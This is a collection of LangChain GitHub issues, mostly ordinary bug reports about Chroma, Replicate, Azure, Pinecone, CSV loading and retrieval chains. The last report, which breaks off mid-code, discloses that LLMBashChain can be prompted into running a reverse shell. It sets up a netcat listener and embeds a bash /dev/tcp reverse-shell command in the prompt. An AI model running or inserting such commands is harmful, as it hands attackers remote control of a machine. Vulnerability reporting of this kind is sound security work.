https://github.com/hwchase17/langchain/blob/master/langchain/llms/replicate.py
```
# replicate.py
def _call(
    self,
    prompt: str,
    stop: Optional[List[str]] = None,
    run_manager: Optional[CallbackManagerForLLMRun] = None,
    **kwargs: Any,
) -> str:
    """Call to replicate endpoint."""
    try:
        import replicate as replicate_python
    except ImportError:
        raise ImportError(
            "Could not import replicate python package. "
            "Please install it with `pip install replicate`."
        )

    # get the model and version
    model_str, version_str = self.model.split(":")
    model = replicate_python.models.get(model_str)
    version = model.versions.get(version_str)

    # sort through the openapi schema to get the name of the first input
    input_properties = sorted(
        version.openapi_schema["components"]["schemas"]["Input"]["properties"].items(),
        key=lambda item: item[1].get("x-order", 0),
    )
    first_input_name = input_properties[0][0]
    print("first input", first_input_name)

    inputs = {first_input_name: prompt, **self.input}
    prediction = replicate_python.predictions.create(version, input={**inputs, **kwargs})
    print("kwargs", kwargs)
    print("status", prediction.status)
    while prediction.status != "succeeded":
        prediction.reload()
    print("end")

    iterator = replicate_python.run(self.model, input={**inputs, **kwargs})
    print("".join([output for output in iterator]))
    return "".join(prediction.output)
```
The reason I want to change max_length (or max_new_tokens) is that I am giving the Replicate LLM a lot of context,
e.g. in the ConversationalRetrievalChain workflow.
However, max_length seems to give me truncated responses, because my chunk sizes are equal to or larger than the default max_length of 500.
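To check whether the parameter even reaches the model, a direct call with the replicate client might help. A sketch — note the exact input name (max_length vs. max_new_tokens) depends on the model's input schema, which can be inspected via version.openapi_schema:
```python
import replicate

output = replicate.run(
    "joehoover/falcon-40b-instruct:xxxxxxxx",  # same model:version string as above
    input={"prompt": "Write three sentences about the sea.", "max_length": 1000},
)
print("".join(output))
```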
### Expected behavior
Truncated responses (usually only one or two words) when chunk sizes are equal to or larger than the LLM's default max token size (500). Hence I would like to raise the token limit but am lost.
| Langchain-Replicate integration (max_length issue_ | https://api.github.com/repos/langchain-ai/langchain/issues/7483/comments | 2 | 2023-07-10T16:12:09Z | 2023-07-10T16:39:42Z | https://github.com/langchain-ai/langchain/issues/7483 | 1,797,089,333 | 7,483 |
[
"hwchase17",
"langchain"
]
| ### System Info
on Python 3.10.10
with requirements.txt
```
pandas==2.0.1
beautifulsoup4==4.12.2
langchain==0.0.229
chromadb==0.3.26
tiktoken==0.4.0
gradio==3.36.1
Flask==2.3.2
torch==2.0.1
sentence-transformers==2.2.2
```
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I'm getting `AttributeError: 'Chroma' object has no attribute '_client_settings'` when running
```python
from langchain.vectorstores import Chroma
import chromadb
from chromadb.config import Settings
from langchain.embeddings import HuggingFaceEmbeddings
from constants.model_constants import HF_EMBEDDING_MODEL
chroma_client = chromadb.Client(Settings(chroma_api_impl="rest", chroma_server_host="xxxxx", chroma_server_http_port="443", chroma_server_ssl_enabled=True))
embedder = HuggingFaceEmbeddings(
model_name=HF_EMBEDDING_MODEL,
model_kwargs={"device": "cpu"},
encode_kwargs={'normalize_embeddings': False}
)
chroma_vector_store = Chroma(
collection_name="test",
embedding_function=embedder,
client=chroma_client)
```
the traceback is
```
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/Users/rubelagu/.pyenv/versions/3.10.10/envs/oraklet_chatbot/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 94, in __init__
    self._client_settings.persist_directory or persist_directory
AttributeError: 'Chroma' object has no attribute '_client_settings'
```
### Expected behavior
It should not raise an exception,
It seems to me that
https://github.com/hwchase17/langchain/blob/5eec74d9a5435c671382e69412072a8725b2ec60/langchain/vectorstores/chroma.py#L93-L95
was introduced by commit https://github.com/hwchase17/langchain/commit/a2830e3056e4e616160b150bf5ea212a97df2dc4
from @nb-programmer and @rlancemartin
that commit assumes that self._client_settings exists always when in reality that won't be created if a client is passed
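As a possible interim workaround (untested sketch): passing `client_settings` instead of a pre-built `client` avoids the code path that assumes `_client_settings` was already set:
```python
settings = Settings(
    chroma_api_impl="rest",
    chroma_server_host="xxxxx",
    chroma_server_http_port="443",
    chroma_server_ssl_enabled=True,
)
chroma_vector_store = Chroma(
    collection_name="test",
    embedding_function=embedder,
    client_settings=settings,  # instead of client=chroma_client
)
```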
| AttributeError: 'Chroma' object has no attribute '_client_settings' | https://api.github.com/repos/langchain-ai/langchain/issues/7482/comments | 4 | 2023-07-10T15:59:17Z | 2023-07-14T11:07:15Z | https://github.com/langchain-ai/langchain/issues/7482 | 1,797,069,693 | 7,482 |
[
"hwchase17",
"langchain"
]
| ### System Info
Works in 0.0.228 but breaks in 0.0.229
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
The latest version of LangChain (0.0.229) seems to break working code from 0.0.228.
For example, this code works in 0.0.228:
```python
def qna(question: str, vector_name: str, chat_history=[]):
logging.debug("Calling qna")
llm, embeddings, llm_chat = pick_llm(vector_name)
vectorstore = pick_vectorstore(vector_name, embeddings=embeddings)
retriever = vectorstore.as_retriever(search_kwargs=dict(k=3))
prompt = pick_prompt(vector_name)
logging.basicConfig(level=logging.DEBUG)
logging.debug(f"Chat history: {chat_history}")
qa = ConversationalRetrievalChain.from_llm(ChatOpenAI(model="gpt-4", temperature=0.2, max_tokens=5000),
retriever=retriever,
return_source_documents=True,
verbose=True,
output_key='answer',
combine_docs_chain_kwargs={'prompt': prompt},
condense_question_llm=OpenAI(model="gpt-3.5-turbo", temperature=0))
try:
result = qa({"question": question, "chat_history": chat_history})
except Exception as err:
error_message = traceback.format_exc()
result = {"answer": f"An error occurred while asking: {question}: {str(err)} - {error_message}"}
logging.basicConfig(level=logging.INFO)
return result
```
But in 0.229 it errors like this:
```
INFO:openai:error_code=None error_message='This is a chat model and not supported in the v1/completions endpoint. Did you mean to use v1/chat/completions?' error_param=model error_type=invalid_request_error message='OpenAI API error received' stream_error=False
```
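The error text suggests the condense-question step is now sending the chat-only gpt-3.5-turbo model to the v1/completions endpoint (0.0.228 may have silently remapped `OpenAI` to the chat endpoint for that model name). A sketch of a possible fix — using the chat wrapper explicitly:
```python
from langchain.chat_models import ChatOpenAI

qa = ConversationalRetrievalChain.from_llm(
    ChatOpenAI(model="gpt-4", temperature=0.2, max_tokens=5000),
    retriever=retriever,
    return_source_documents=True,
    verbose=True,
    output_key="answer",
    combine_docs_chain_kwargs={"prompt": prompt},
    condense_question_llm=ChatOpenAI(model="gpt-3.5-turbo", temperature=0),  # was OpenAI(...)
)
```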
### Expected behavior
Same output | 0.0.229 breaks existing code that works with 0.0.228 for ConverstaionalRetrievalChain | https://api.github.com/repos/langchain-ai/langchain/issues/7481/comments | 3 | 2023-07-10T15:20:34Z | 2023-07-12T00:51:00Z | https://github.com/langchain-ai/langchain/issues/7481 | 1,797,005,937 | 7,481 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.219
python 3.9
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
import os
from llama_index import LLMPredictor,ServiceContext,LangchainEmbedding
from langchain.embeddings.huggingface import HuggingFaceEmbeddings
from langchain.agents import Tool
from langchain.chains.conversation.memory import ConversationBufferMemory
from langchain.chat_models import AzureChatOpenAI
BASE_URL = "url"
API_KEY = "key"
DEPLOYMENT_NAME = "deployment_name"
model = AzureChatOpenAI(
openai_api_base=BASE_URL,
openai_api_version="version",
deployment_name=DEPLOYMENT_NAME,
openai_api_key=API_KEY,
openai_api_type="azure",
)
from langchain.agents import initialize_agent
from llama_index import VectorStoreIndex, SimpleDirectoryReader
documents = SimpleDirectoryReader("/Data").load_data()
llm_predictor = LLMPredictor(llm=model)
embed_model = LangchainEmbedding(HuggingFaceEmbeddings(model_name='huggingface model'))
service_context = ServiceContext.from_defaults(llm_predictor=llm_predictor,embed_model=embed_model)
index = VectorStoreIndex.from_documents(documents=documents,service_context=service_context)
tools = [
Tool(
name="LlamaIndex",
func=lambda q: str(index.as_query_engine().query(q)),
description="useful for when you want to answer questions about the author. The input to this tool should be a complete english sentence.",
return_direct=True,
),
]
memory = ConversationBufferMemory(memory_key="chat_history")
agent_executor = initialize_agent(
tools, model, agent="conversational-react-description", memory=memory
)
while True:
query = input("Enter query\n")
print(agent_executor.run(input=query))
```
Trying the above code, but when I ask queries it throws the error: **langchain.schema.OutputParserException: Could not parse LLM output: `Thought: Do I need to use a tool? No`**
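A hedged workaround that at least stops the hard failure — `initialize_agent` forwards `handle_parsing_errors` to the AgentExecutor, which then feeds the parse error back to the model instead of raising:
```python
agent_executor = initialize_agent(
    tools,
    model,
    agent="conversational-react-description",
    memory=memory,
    handle_parsing_errors=True,  # retry on OutputParserException instead of raising
)
```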
### Expected behavior
The error should not occur | langchain.schema.OutputParserException: Could not parse LLM output: `Thought: Do I need to use a tool? No | https://api.github.com/repos/langchain-ai/langchain/issues/7480/comments | 7 | 2023-07-10T14:40:24Z | 2024-06-11T12:24:18Z | https://github.com/langchain-ai/langchain/issues/7480 | 1,796,927,559 | 7,480 |
[
"hwchase17",
"langchain"
]
| ### System Info
I have a CSV file with profile information: names, birthdate, gender, favorite movies, etc.
I need to create a chatbot over this data and I am trying to use the CSVLoader like this:
```
loader = CSVLoader(file_path="profiles.csv", source_column="IdentityId")
doc = loader.load()
text_splitter = CharacterTextSplitter(chunk_size=5000, chunk_overlap=0)
#docs = text_splitter.split_documents(documents)
embed = OpenAIEmbeddings(deployment=OPENAI_EMBEDDING_DEPLOYMENT_NAME, model=OPENAI_EMBEDDING_MODEL_NAME, chunk_size=1)
docsearch = Pinecone.from_documents(doc, embed, index_name="cubigo")
llm = AzureChatOpenAI(
openai_api_base=OPENAI_DEPLOYMENT_ENDPOINT,
openai_api_version=OPENAI_API_VERSION ,
deployment_name=OPENAI_DEPLOYMENT_NAME,
openai_api_key=OPENAI_API_KEY,
openai_api_type = OPENAI_API_TYPE ,
model_name=OPENAI_MODEL_NAME,
temperature=0)
user_input = get_text()
docs = docsearch.similarity_search(user_input)
st.write(docs)
```
However, I get an error (full traceback under Reproduction below).
The file looks like this:
```
IdentityId,FirstName,LastName,Gender,Birthdate,Birthplace,Hometown,content
1A9DCDD4-DD7E-4235-BA0C-00CB0EC7FF4F,FirstName0002783,LastName0002783,Unknown,Not specified,Not Specified,Not Specified,"First Name: FirstName0002783. Last Name: LastName0002783. Role Name: Resident IL. Gender: Unknown. Phone number: Not specified. Cell Phone number: Not specified. Address2: 213. Birth Date: Not specified. Owned Technologies: Not specified. More About Me: Not Specified. Birth place: Not Specified. Home town:Not Specified. Education: Not Specified. College Name: Not Specified. Past Occupations: Not Specified. Past Interests:Not specified. Veteran: Not Specified. Name of spouse: Not specified, Religious Preferences: Not specified. Spoken Languages: Not specified. Active Live Description: Not specified. Retired Live Description: Not specified. Accomplishments: Not specified. Marital Status: Not specified. Anniversary Date: Not specified. Your typical day: Not specified. Talents and Hobbies: Not specified. Interest categories: Not specified. Other Interest Categories: Not specified. Favorite Actor: Not specified. Favorite Actress: Not specified. Favorite Animal: Not specified. Favorite Author: Not specified. Favorite Band Musical Artist: Not specified. Favorite Book: Not specified. Favorite Climate: Not specified. Favorite Color: Not specified. Favorite Dance: Not specified. Favorite Dessert: Not specified. Favorite Drink: Not specified. Favorite Food: Not specified. Favorite Fruit: Not specified. Favorite Future Travel Destination: Not specified. Favorite Movie: Not specified. Favorite Past Travel Destination: Not specified. Favorite Game: Not specified. Favorite Season Of The Year: Not specified. Favorite Song: Not specified. Favorite Sport: Not specified. Favorite Sports Team: Not specified. Favorite Tv Show: Not specified. Favorite Vegetable: Not specified. FavoritePastTravelDestination: Not specified"
D50E05C9-16EB-4554-808C-01EEDE433076,FirstName0003583,LastName0003583,Unknown,Not specified,Not Specified,Not Specified,"First Name: FirstName0003583. Last Name: LastName0003583. Role Name: Resident AL. Gender: Unknown. Phone number: Not specified. Cell Phone number: Not specified. Address2: Not specified. Birth Date: Not specified. Owned Technologies: Not specified. More About Me: Not Specified. Birth place: Not Specified. Home town:Not Specified. Education: Not Specified. College Name: Not Specified. Past Occupations: Not Specified. Past Interests:Not specified. Veteran: Not Specified. Name of spouse: Not specified, Religious Preferences: Not specified. Spoken Languages: Not specified. Active Live Description: Not specified. Retired Live Description: Not specified. Accomplishments: Not specified. Marital Status: Not specified. Anniversary Date: Not specified. Your typical day: Not specified. Talents and Hobbies: Not specified. Interest categories: Not specified. Other Interest Categories: Not specified. Favorite Actor: Not specified. Favorite Actress: Not specified. Favorite Animal: Not specified. Favorite Author: Not specified. Favorite Band Musical Artist: Not specified. Favorite Book: Not specified. Favorite Climate: Not specified. Favorite Color: Not specified. Favorite Dance: Not specified. Favorite Dessert: Not specified. Favorite Drink: Not specified. Favorite Food: Not specified. Favorite Fruit: Not specified. Favorite Future Travel Destination: Not specified. Favorite Movie: Not specified. Favorite Past Travel Destination: Not specified. Favorite Game: Not specified. Favorite Season Of The Year: Not specified. Favorite Song: Not specified. Favorite Sport: Not specified. Favorite Sports Team: Not specified. Favorite Tv Show: Not specified. Favorite Vegetable: Not specified. FavoritePastTravelDestination: Not specified"
```
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Use this code:
```
loader = CSVLoader(file_path="profiles.csv", source_column="IdentityId")
doc = loader.load()
text_splitter = CharacterTextSplitter(chunk_size=5000, chunk_overlap=0)
#docs = text_splitter.split_documents(documents)
embed = OpenAIEmbeddings(deployment=OPENAI_EMBEDDING_DEPLOYMENT_NAME, model=OPENAI_EMBEDDING_MODEL_NAME, chunk_size=1)
docsearch = Pinecone.from_documents(doc, embed, index_name="x")
llm = AzureChatOpenAI(
openai_api_base=OPENAI_DEPLOYMENT_ENDPOINT,
openai_api_version=OPENAI_API_VERSION ,
deployment_name=OPENAI_DEPLOYMENT_NAME,
openai_api_key=OPENAI_API_KEY,
openai_api_type = OPENAI_API_TYPE ,
model_name=OPENAI_MODEL_NAME,
temperature=0)
user_input = get_text()
docs = docsearch.similarity_search(user_input)
st.write(docs)
```
The error is here:
**File "C:\Users\xx\anaconda3\envs\xx\Lib\encodings\cp1252.py", line 23, in decode
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^**
`Exception: UnicodeDecodeError: 'charmap' codec can't decode byte 0x9d in position 2810: character maps to <undefined>`
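The `cp1252.py` frame in the traceback shows the file is being read with the Windows default codepage; if the CSV is actually UTF-8 (byte 0x9d suggests it is), passing the encoding explicitly should help. A sketch:
```python
loader = CSVLoader(
    file_path="profiles.csv",
    source_column="IdentityId",
    encoding="utf-8",  # or "utf-8-sig" if the file has a BOM
)
doc = loader.load()
```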
### Expected behavior
The CSV should load without any issues. | UnicodeDecodeError: 'charmap' codec can't decode byte 0x9d in position 2810: character maps to <undefined> | https://api.github.com/repos/langchain-ai/langchain/issues/7479/comments | 5 | 2023-07-10T14:37:28Z | 2023-10-17T16:05:34Z | https://github.com/langchain-ai/langchain/issues/7479 | 1,796,921,581 | 7479 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
```python
def generate_answer(vector_store, question):
    chain = load_chain("qna/configs/chains/qa_with_sources_gpt4all.json")
    # print(chain)
    # qa = VectorDBQAWithSourcesChain(combine_document_chain=chain, vectorstore=vector_store)
    qa = RetrievalQAWithSourcesChain(combine_document_chain=chain, retriever=vector_store.as_retriever())
    result = send_prompt(qa, question)
    return result
```
I'm experimenting with the chains module. The code above works with an OpenAI model, but when I switch to the GPT4All groovy model it throws this error:

### Suggestion:
Can you tell me whether I'm doing this right or wrong? Is the GPT4All model supported here or not?
| gpt4all+langchain_chain(RetrievalQAWithSourcesChain) | https://api.github.com/repos/langchain-ai/langchain/issues/7475/comments | 3 | 2023-07-10T11:15:34Z | 2023-11-28T16:09:35Z | https://github.com/langchain-ai/langchain/issues/7475 | 1,796,536,439 | 7,475 |
[
"hwchase17",
"langchain"
]
| Hi everyone,
I'm trying to do something and I haven't found enough information on the internet to make it work properly with LangChain. Here it is:
I want to develop a QA chat that uses markdown documents as its knowledge source, restricting retrieval to the documents of the documentation version the user picks from a select box. To achieve that:
1. I've built a FAISS vector store from documents located in two different folders, representing the documentation's versions. The folder structure looks like this:
```
.
├── 4.14.2
│ ├── folder1
│ │ └── file1.md
│ ├── folder2
│ │ └── file2.md
└── 4.18.1
├── folder1
│ └── file3.md
└── folder2
└── file4.md
```
2. Each document's metadata looks something like this: ```{'source': 'app/docs-versions/4.14.2/folder1/file1.md'}```
3. With all this I'm using a ConversationalRetrievalChain to retrieve info from the vector store and using an llm to answer questions entered via prompt:
```python
memory = st.session_state.memory = ConversationBufferMemory(
memory_key="chat_history", return_messages=True, output_key="answer"
)
source_filter = f'app/docs-versions/{version}/'
chain = ConversationalRetrievalChain.from_llm(
llm=llm,
retriever=store.as_retriever(
search_kwargs={'filter': {'source': source_filter}}
),
memory=memory,
verbose=False,
return_source_documents=True,
)
```
As you can see, as a summary, my goal is to filter the documents retrieved to use only the ones contained in a certain directory, representing the documentation's version.
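One detail that may matter: as far as I can tell, the FAISS store's filter compares metadata values by exact equality, so a path prefix like `app/docs-versions/4.14.2/` never equals the full source path. A sketch of an alternative — tagging each document with an exact-match version field at ingestion (`documents` here stands for whatever list is indexed):
```python
# at ingestion time, derive the version from the folder name
for doc in documents:
    doc.metadata["version"] = doc.metadata["source"].split("/")[2]  # e.g. "4.14.2"

# at query time, exact match on that field
retriever = store.as_retriever(
    search_kwargs={"filter": {"version": version}, "k": 4}
)
```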
Does anyone know how I can achieve this (or whether the exact-match version field sketched above is the right direction)? The approach I originally tried doesn't work for what I want: the retrieved documents come from both folders. | Filtering retrieval with ConversationalRetrievalChain | https://api.github.com/repos/langchain-ai/langchain/issues/7474/comments | 5 | 2023-07-10T11:10:43Z | 2024-04-15T10:11:15Z | https://github.com/langchain-ai/langchain/issues/7474 | 1,796,527,888 | 7474 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Adapt the Pinecone vectorstore to support the upcoming starter tier. The changes involve removing reliance on namespaces and on the delete-by-metadata feature.
### Motivation
Indexes in upcoming Pinecone V4 won't support:
* namespaces
* `configure_index()`
* delete by metadata
* `describe_index()` with metadata filtering
* `metadata_config` parameter to `create_index()`
* `delete()` with the `deleteAll` parameter
### Your contribution
I'll do it. | Pinecone: Support starter tier | https://api.github.com/repos/langchain-ai/langchain/issues/7472/comments | 6 | 2023-07-10T10:19:16Z | 2023-07-12T19:41:36Z | https://github.com/langchain-ai/langchain/issues/7472 | 1,796,444,479 | 7,472 |
[
"hwchase17",
"langchain"
]
| ### Feature request
I want to be able to override `google_search_url` on `GoogleSearchAPIWrapper`, though that attribute does not exist yet.
https://api.python.langchain.com/en/latest/utilities/langchain.utilities.google_search.GoogleSearchAPIWrapper.html#langchain.utilities.google_search.GoogleSearchAPIWrapper
Just like BingSearchAPIWrapper can override `bing_search_url`, I hope I can also override `google_search_url`.
https://api.python.langchain.com/en/latest/utilities/langchain.utilities.bing_search.BingSearchAPIWrapper.html#langchain.utilities.bing_search.BingSearchAPIWrapper.bing_search_url
### Motivation
I want to mock google API response.
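Until the URL is overridable, the only option I see is patching the wrapper itself. A sketch, assuming construction succeeds with dummy credentials:
```python
from unittest.mock import patch
from langchain.utilities import GoogleSearchAPIWrapper

with patch.object(GoogleSearchAPIWrapper, "run", return_value="mocked result"):
    search = GoogleSearchAPIWrapper(google_api_key="dummy", google_cse_id="dummy")
    assert search.run("anything") == "mocked result"
```
With an overridable `google_search_url`, the mock could instead be a local test server, the same way `bing_search_url` allows.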
### Your contribution
I don't think I am capable of implementing this myself. | Add google search API url | https://api.github.com/repos/langchain-ai/langchain/issues/7471/comments | 1 | 2023-07-10T09:23:14Z | 2023-10-16T16:05:24Z | https://github.com/langchain-ai/langchain/issues/7471 | 1,796,347,569 | 7471 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.219
Python 3.9
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
from langchain.chat_models import AzureChatOpenAI
from langchain.schema import HumanMessage
model = AzureChatOpenAI(
openai_api_base="baseurl",
openai_api_version="version",
deployment_name="name",
openai_api_key="key",
openai_api_type="type",
)
print(model(
[
HumanMessage(
content="Translate this sentence from English to French. I love programming."
)
]
))
```
I filled in the relevant values (real configuration). Still, I am getting the error: **openai.error.InvalidRequestError: The API deployment for this resource does not exist. If you created the deployment within the last 5 minutes, please wait a moment and try again.**
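This error usually points at `deployment_name` not matching an actual Azure deployment (or an api_base/api_version mismatch) rather than at LangChain itself. A direct SDK call can isolate it — a sketch with the same placeholder values:
```python
import openai

openai.api_type = "azure"
openai.api_base = "baseurl"     # https://<resource>.openai.azure.com/
openai.api_version = "version"  # e.g. 2023-05-15
openai.api_key = "key"

resp = openai.ChatCompletion.create(
    engine="name",  # must be the *deployment* name from the Azure portal, not the model name
    messages=[{"role": "user", "content": "ping"}],
)
print(resp.choices[0].message.content)
```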
### Expected behavior
It should run without any error, because I took the code from the official documentation: https://python.langchain.com/docs/modules/model_io/models/chat/integrations/azure_chat_openai | openai.error.InvalidRequestError: The API deployment for this resource does not exist. If you created the deployment within the last 5 minutes, please wait a moment and try again. | https://api.github.com/repos/langchain-ai/langchain/issues/7470/comments | 2 | 2023-07-10T09:11:15Z | 2023-10-16T16:05:29Z | https://github.com/langchain-ai/langchain/issues/7470 | 1,796,327,821 | 7470 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Starting from 1.26.1, the Vertex SDK exposes chat_history explicitly.
### Motivation
Currently you can't work with chat_history if you use a fresh version of the Vertex SDK.
### Your contribution
yes, I'll do it. | Support new chat_history for Vertex AI | https://api.github.com/repos/langchain-ai/langchain/issues/7469/comments | 1 | 2023-07-10T08:54:03Z | 2023-07-13T05:13:31Z | https://github.com/langchain-ai/langchain/issues/7469 | 1,796,298,829 | 7,469 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain 0.0.228
### Who can help?
@dev2049
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
My code is very similar to the existing example, except that instead of `Pinecone.from_documents` I use `Pinecone.from_existing_index`:
```
llm = AzureChatOpenAI(
openai_api_base=OPENAI_DEPLOYMENT_ENDPOINT,
openai_api_version=OPENAI_API_VERSION ,
deployment_name=OPENAI_DEPLOYMENT_NAME,
openai_api_key=OPENAI_API_KEY,
openai_api_type = OPENAI_API_TYPE ,
model_name=OPENAI_MODEL_NAME,
temperature=0)
embed = OpenAIEmbeddings(deployment=OPENAI_EMBEDDING_DEPLOYMENT_NAME, model=OPENAI_EMBEDDING_MODEL_NAME, chunk_size=1)
user_input = get_text()
metadata_field_info = [
AttributeInfo(
name="IdentityId",
description="The id of the resident",
type="string",
),
AttributeInfo(
name="FirstName",
description="The first name of the resident",
type="string",
),
AttributeInfo(
name="LastName",
description="The last name of the resident",
type="string",
),
AttributeInfo(
name="Gender",
description="The gender of the resident",
type="string"
),
AttributeInfo(
name="Birthdate",
description="The birthdate of the resident",
type="string"
),
AttributeInfo(
name="Birthplace",
description="The birthplace of the resident",
type="string"
),
AttributeInfo(
name="Hometown",
description="The hometown of the resident",
type="string"
)
]
document_content_description = "General information about the resident for example: Phone number, Cell phone number, address, birth date, owned technologies, more about me, education, college name, past occupations, past interests, whether is veteran or not, name of spouse, religious preferences, spoken languages, active live description, retired live description, accomplishments, marital status, anniversary date, his/her typical day, talents and hobbies, interest categories, other interest categories, favorite actor, favorite actress, etc"
llm = OpenAI(temperature=0)
vectordb = Pinecone.from_existing_index("default",embedding=embed, namespace="profiles5")
retriever = SelfQueryRetriever.from_llm(
llm, vectordb, document_content_description, metadata_field_info, verbose=True
)
qa_chain = RetrievalQA.from_chain_type(llm,retriever=retriever)
response = qa_chain.run(user_input)
st.write(response)
```
Error:
TypeError: 'NoneType' object is not callable
Traceback:
```
  File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\streamlit\runtime\scriptrunner\script_runner.py", line 552, in _run_script
    exec(code, module.__dict__)
  File "C:\Users\xx\repos\cnChatbotv1\app\pages\07Chat With Pinecone self-querying.py", line 151, in <module>
    main()
  File "C:\Users\xx\repos\cnChatbotv1\app\pages\07Chat With Pinecone self-querying.py", line 142, in main
    retriever = SelfQueryRetriever.from_llm(
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\retrievers\self_query\base.py", line 149, in from_llm
    llm_chain = load_query_constructor_chain(
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\base.py", line 142, in load_query_constructor_chain
    prompt = _get_prompt(
    ^^^^^^^^^^^^
  File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\base.py", line 103, in _get_prompt
    output_parser = StructuredQueryOutputParser.from_components(
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\base.py", line 60, in from_components
    ast_parser = get_parser(
    ^^^^^^^^^^^
  File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\parser.py", line 148, in get_parser
    transformer = QueryTransformer(
```
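Possibly relevant: `QueryTransformer` seems to be defined only when the optional `lark` dependency imports cleanly, which would leave it as `None` here (an old `lark-parser` install can also shadow it). Worth checking:
```python
import lark
print(lark.__version__)  # if this fails or is very old: pip install -U lark
```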
### Expected behavior
A response to the query should be returned. | TypeError: 'NoneType' object is not callable in SelfQueryRetriever.from_llm | https://api.github.com/repos/langchain-ai/langchain/issues/7468/comments | 3 | 2023-07-10T08:33:10Z | 2023-07-10T13:36:01Z | https://github.com/langchain-ai/langchain/issues/7468 | 1,796,263,402 | 7468 |
[
"hwchase17",
"langchain"
]
| ### Feature request
I am using pgvector and hoping for an MMR retrieval method similar to the Qdrant implementation.
### Motivation
MMR retrieval can return more diverse results, removing duplicate rows, which meets my needs (I did some testing on qdrant). However, I couldn't find an implementation in vectorstore of type pgvector.
### Your contribution
I found that in the current implementation of the pgvector class, the retrieval results do not return the original vectors, so it is not possible to simply add MMR post-processing. Is this due to performance considerations? Have you considered adding an option for this? | pgvector add implemention of MMR | https://api.github.com/repos/langchain-ai/langchain/issues/7466/comments | 3 | 2023-07-10T08:08:26Z | 2023-11-28T16:16:39Z | https://github.com/langchain-ai/langchain/issues/7466 | 1,796,222,961 | 7,466 |
[
"hwchase17",
"langchain"
]
| ### System Info
```
LangChain version v0.0.228
Linux * 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
Python 3.9.13
```
### Who can help?
@hwchase17
@agola11
@coyotespike
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Reproduce with these steps:
1. `nc -lvp 4444`: open port 4444 with a netcat listener.
2. Run the below code.
```python
from langchain.chains import LLMBashChain
from langchain.llms import OpenAI
llm = OpenAI(temperature=0)
text = "Please write a bash script that executes `bash -c 'bash -i >& /dev/tcp/0.0.0.0/4444 0>&1'`"
